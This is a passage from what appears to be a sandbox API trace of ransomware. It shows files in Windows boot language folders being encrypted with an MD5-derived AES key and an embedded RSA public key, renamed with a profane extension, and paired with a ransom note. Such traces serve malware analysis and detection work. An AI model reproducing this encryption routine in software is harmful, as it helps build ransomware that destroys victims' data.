| out: phProv=0x2b9e404*=0x27828f8) returned 1 [0231.709] CryptImportPublicKeyInfo (in: hCryptProv=0x27828f8, dwCertEncodingType=0x1, pInfo=0x277c410*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c440*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c448*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716c28) returned 1 [0231.709] CryptEncrypt (in: hKey=0x2716c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.709] CryptEncrypt (in: hKey=0x2716c28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27826d8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27826d8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.710] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27826d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.710] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278ab30, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.710] CryptEncrypt (in: hKey=0x27167e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.710] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.710] CloseHandle (hObject=0xffffffff) returned 1 [0231.710] CloseHandle (hObject=0xffffffff) returned 1 [0231.710] CopyFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.710] SetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.710] DeleteFileA (lpFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.gsg")) returned 0 [0231.710] MoveFileA (lpExistingFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\ru-RU\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui.fuck")) returned 0 [0231.711] CryptDestroyHash (hHash=0x2716ce8) returned 1 [0231.711] CryptDestroyKey (hKey=0x27167e8) returned 1 [0231.711] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.711] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.711] FindNextFileA (in: hFindFile=0x2716f68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.711] FindClose (in: hFindFile=0x2716f68 | out: hFindFile=0x2716f68) returned 1 [0231.711] GetFileAttributesA (lpFileName="C:\\\\Boot\\ru-RU\\README_BACK_FILES.htm" (normalized: "c:\\boot\\ru-ru\\readme_back_files.htm")) returned 0x20 [0231.713] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.713] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sk-SK\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.714] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.714] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.714] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.714] GetLastError () returned 0x12 [0231.714] GetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui")) returned 0x20 [0231.715] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.716] CreateFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.716] CreateFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.716] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.716] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.718] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.718] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.718] CryptHashData (hHash=0x2716b68, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.718] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.718] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.718] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.718] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782980) returned 1 [0231.718] CryptImportPublicKeyInfo (in: hCryptProv=0x2782980, dwCertEncodingType=0x1, pInfo=0x277c8f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c920*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c928*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716f68) returned 1 [0231.719] CryptEncrypt (in: hKey=0x2716f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.719] CryptEncrypt (in: hKey=0x2716f68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27827e8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27827e8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.719] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27827e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.719] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278ab30, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.719] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278ab30*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.719] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278ab30, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.719] CloseHandle (hObject=0xffffffff) returned 1 [0231.719] CloseHandle (hObject=0xffffffff) returned 1 [0231.719] CopyFileA (lpExistingFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.719] SetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.719] DeleteFileA (lpFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.gsg")) returned 0 [0231.720] MoveFileA (lpExistingFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sk-SK\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sk-sk\\bootmgr.exe.mui.fuck")) returned 0 [0231.720] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.720] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.720] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.720] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.720] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.720] FindClose (in: hFindFile=0x2716aa8 | out: hFindFile=0x2716aa8) returned 1 [0231.720] GetFileAttributesA (lpFileName="C:\\\\Boot\\sk-SK\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sk-sk\\readme_back_files.htm")) returned 0x20 [0231.721] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.721] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sl-SI\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x27167e8 [0231.722] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.722] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.722] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.722] GetLastError () returned 0x12 [0231.722] GetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui")) returned 0x20 [0231.722] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.722] CreateFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.722] CreateFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.722] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.723] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.724] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.724] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.724] CryptHashData (hHash=0x2716aa8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.724] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716aa8, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716b68) returned 1 [0231.725] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.725] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.725] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2781f68) returned 1 [0231.725] CryptImportPublicKeyInfo (in: hCryptProv=0x2781f68, dwCertEncodingType=0x1, pInfo=0x277c9c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277c9f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277c9f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x2716868) returned 1 [0231.725] CryptEncrypt (in: hKey=0x2716868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.725] CryptEncrypt (in: hKey=0x2716868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27823a8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x27823a8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.725] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27823a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.725] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.725] CryptEncrypt (in: hKey=0x2716b68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.725] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.725] CloseHandle (hObject=0xffffffff) returned 1 [0231.725] CloseHandle (hObject=0xffffffff) returned 1 [0231.725] CopyFileA (lpExistingFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.726] SetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.726] DeleteFileA (lpFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.gsg")) returned 0 [0231.726] MoveFileA (lpExistingFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sl-SI\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sl-si\\bootmgr.exe.mui.fuck")) returned 0 [0231.726] CryptDestroyHash (hHash=0x2716aa8) returned 1 [0231.726] CryptDestroyKey (hKey=0x2716b68) returned 1 [0231.727] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.727] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.727] FindNextFileA (in: hFindFile=0x27167e8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.727] FindClose (in: hFindFile=0x27167e8 | out: hFindFile=0x27167e8) returned 1 [0231.727] GetFileAttributesA (lpFileName="C:\\\\Boot\\sl-SI\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sl-si\\readme_back_files.htm")) returned 0x20 [0231.730] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.730] FindFirstFileA (in: lpFileName="C:\\\\Boot\\sr-Latn-CS\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x2716aa8 [0231.731] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.731] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.731] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.731] GetLastError () returned 0x12 [0231.731] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui")) returned 0x20 [0231.731] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.731] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.732] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.732] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.732] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.734] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.734] lstrlenA (lpString="CzcpzneZBYsNtiBMhLENKzVGzMlQm") returned 29 [0231.734] CryptHashData (hHash=0x2716b68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.734] CryptDeriveKey (in: hProv=0x2781330, Algid=0x6610, hBaseData=0x2716b68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x2716ce8) returned 1 [0231.734] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.734] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.734] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x2782870) returned 1 [0231.734] CryptImportPublicKeyInfo (in: hCryptProv=0x2782870, dwCertEncodingType=0x1, pInfo=0x277d380*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x277d3b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x277d3b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x27167e8) returned 1 [0231.734] CryptEncrypt (in: hKey=0x27167e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.734] CryptEncrypt (in: hKey=0x27167e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2781ff0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x2781ff0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.734] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2781ff0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.734] ReadFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x278b738, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.734] CryptEncrypt (in: hKey=0x2716ce8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x278b738*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.734] WriteFile (in: hFile=0xffffffff, lpBuffer=0x278b738, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.735] CloseHandle (hObject=0xffffffff) returned 1 [0231.735] CloseHandle (hObject=0xffffffff) returned 1 [0231.735] CopyFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.735] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.735] DeleteFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.gsg")) returned 0 [0231.735] MoveFileA (lpExistingFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\sr-Latn-CS\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\sr-latn-cs\\bootmgr.exe.mui.fuck")) returned 0 [0231.735] CryptDestroyHash (hHash=0x2716b68) returned 1 [0231.735] CryptDestroyKey (hKey=0x2716ce8) returned 1 [0231.735] CryptReleaseContext (hProv=0x2781330, dwFlags=0x0) returned 1 [0231.735] FindNextFileA (in: hFindFile=0x2716aa8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.736] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.736] GetLastError () returned 0x5 [0231.736] GetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui")) returned 0x20 [0231.736] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.736] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.737] CreateFileA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.737] SetFileAttributesA (lpFileName="C:\\\\Boot\\sr-Latn-CS\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.737] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x2781330) returned 1 [0231.739] CryptCreateHash (in: hProv=0x2781330, Algid=0x8003, hKey=0x0, dwFlags=0x0, 